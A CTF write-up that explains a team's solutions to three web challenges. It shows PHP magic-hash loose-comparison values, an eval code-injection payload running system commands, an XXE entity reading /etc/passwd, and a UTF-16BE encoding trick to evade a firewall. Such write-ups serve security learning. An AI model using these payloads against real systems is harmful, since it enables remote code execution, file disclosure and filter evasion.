Sudan National CTF 2020 | Web Challenges Writeups
Hello everyone,
in here we are going to discuss the solutions for the web challenges of this CTF orgnized by cybertalents and TrendMicro.
we as “ScriptKiddies” team scored the first place with 825 points.
! Writeups for [reverse, crypto, forensics] challenges: here
let’s start with a challenge that looks easy but it took almost all the time of the contest for us to solve
Name: Web101
Link: http://ec2-18-156-199-115.eu-central-1.compute.amazonaws.com/web101/
Description: May the source be with you.
Points: 50pts
from the discription of the challenge we know it’s somehow related to finding the source code of the application, we tried almost everything we know to get it, starting from Directory and Parameter brute forcing and Headers fuzzing untill we discovered that it just need a request with:
accept: text/php
crazy huh? 😂 WHAT a ^&*# developer
Challenge Name: Gallery
Link: http://ec2-18-156-199-115.eu-central-1.compute.amazonaws.com/gallery/
Points: 100pts
it shows us the pictures when we click in each section, but what about section 5
it looks like a GET parameter,
it needs two different values that when computing the md5 of them they give has the same hash and that’s impossible.
the mistake in that code is that it uses a loose php comparison to compare between the hashes and values.
md5('240610708')
= 0e462097431906509019562988736854
md5('QNKCDZO')
= 0e830400451993494058024219903391
when comparing them with “==” php will consider the two hashes as numeric values.
/fl4r3GuN2020.php
it takes a /?code=(CODE) and execute it through eval() but the code is going to pass through addslashes() first, meaning that any single or double qoutes are going to be useless.
it also needs us to execute a code written inside a string $code = “our_code_here”;
for that purpose we are going to execute it with ${eval(CODE)} but we need a code without using single or doube qoutes.
we will use $_GET[1] for taking the code from another get parameter named 1
${eval($_GET[1])}
/?code=${eval($_GET[1])}&1=system(“ls -la”);
/?code=${eval($_GET[1])}&1=system(“cat 2020_keep_It_53cR3t_H3r3.php”);
Challenge Name: R3cova
Discription: sorry for the inconvenience, our website still under construction
Link: http://ec2–18–156–199–115.eu-central-1.compute.amazonaws.com/revoca/
Points: 100pts
/users.php
/new.php
in this page we can upload an xml file to add a new user, we’ve given a sample file that looks like:
the most suitable attack for this upload is XXE Attack (XML External Entities)
we can declare an entity to get the content of local files as follow:
<!DOCTYPE x[
<!ENTITY content SYSTEM “file:///etc/passwd”>
]>
then we add it to our sample file and set it to view our file content:
uploading this malicious xml triggered a firewall alert
we managed to bypass this firewall by modifing the encoding of the file as we know the xml parsers support different encodings like UTF-8,UTF-16.
we are going to use big endians UTF-16 AKA UTF-16BE
cat sample.xml | iconv -f UTF-8 -t UTF-16BE > malicious.xml
cool, it seems working but it has limit showing only the first 20 characters of the file, we could bypass that by using blind XXE techniques,
the easy way was by adding intro tag to the xml file <intro>UNLIMITED</intro>
we discovered this field from users.php page as it showing four elements: name, email, group and intro
cool it’s working, we were able to find the flag in the root directory “/flag.txt”
and that’s it.
Thanks.
References:
“Magic Hashes” https://github.com/ryanking13/ctf-cheatsheet/blob/master/Cryptography/Useful_Hashes.md
“PHP: Strings — Manual”, https://www.php.net/manual/en/language.types.string.php